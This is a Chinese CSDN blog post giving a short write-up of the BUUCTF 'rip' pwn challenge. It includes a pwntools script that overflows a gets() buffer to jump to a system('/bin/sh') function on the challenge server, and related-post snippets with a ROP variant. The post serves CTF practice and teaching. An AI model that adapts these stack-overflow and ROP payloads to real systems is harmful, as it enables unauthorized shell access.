BUUCTF(Pwn) rip

最新推荐文章于 2024-06-13 21:31:31 发布
最新推荐文章于 2024-06-13 21:31:31 发布
阅读量470 收藏 1
点赞数 3
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/115025934
版权

在这里插入图片描述在这里插入图片描述在这里插入图片描述
按tab键,看一下 fun函数 发现其地址是 0x401186;
但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行

from pwn import *

p = remote('node3.buuoj.cn', '25677') 

payload = 'a' * (0xf + 8) + p64(0x40118A)

p.sendline(payload)

p.interactive()

在这里插入图片描述

半岛铁盒@
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2484
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF pwn rip
weixin_55190422的博客
11-03 300
现在开始是记录我个人对BUUPWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
BUUCTF Pwn rip
weixin_41557838的博客
05-27 328
BUUCTF Pwn rip
buuctf-rip
最新发布
Nike_name的博客
06-13 359
利用get危险函数和system/bin/sh 的栈溢出
buuctf PWN rip
wp568的博客
10-04 71
fun函数的地址是0x401186。下载pwn1 用IDA打开。
Buuctf pwn rip
2301_79960856的博客
01-26 421
发现存在漏洞,gets函数的使用导致栈溢出,攻击者可以利用栈溢出漏洞来执行恶意代码或获取未授权的访问权限。第三行黄色内容中0×F为gets到return的距离,0×8为gets到ebp的距离。虚拟机终端里输入vim yi.py,enter键,i键。(1).终端里输入 checksec +文件名。(2).按F5 将汇编语言转为C语言。输入脚本内容替换原输入的任意字符。(1).用ida64打开文件。(1).构造Python脚本。输入任意字符后,Ctrl+c。输入“:wq”,enter键。检查发现为64位文件。
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4957
BUU CTF PWN 入门知识详解
BUUCTF pwn rip WriteUp
柠檬i的博客
12-09 423
pwn基础之栈溢出
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1155
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
BUUCTF pwnrip
Cfoxer的博客
02-15 231
计算覆盖位数,因为get内容为s所以此处应该为s位数15(0xf-0x0),加上rbp(栈底指针寄存器)大小8位,一共为23位。直接得到思路,栈溢出覆盖rip,使返回地址变成fun函数的地址,执行systen(/bin/sh),getshell。查看main函数发现危险函数gets推断为栈溢出漏洞。发现文件为64位elf可执行文件。发现并没有开启任何的保护。
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 1172
(写得好详细我好爱(为什么payload有两种写法于。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
2024NKCTF-pwn
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6205
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子
半岛铁盒的博客
03-05 1392
说明 这其实是一种类型题,新手刚开始会碰到,题目大致过程是 有个srand()的随机函数.需要覆盖 seed种子 即srand(seed) 把 seed 覆盖为一个固定的数 , srand 就是伪随机函数了, 题目会有个猜数循 环,比如猜对了20次flag就有了,和这道题类似的题目还有新手区的guess_num 解题 点进去read中的 buf; EXp from pwn import * from ctypes import * p=remote('111.200.241.244','38
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1295
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值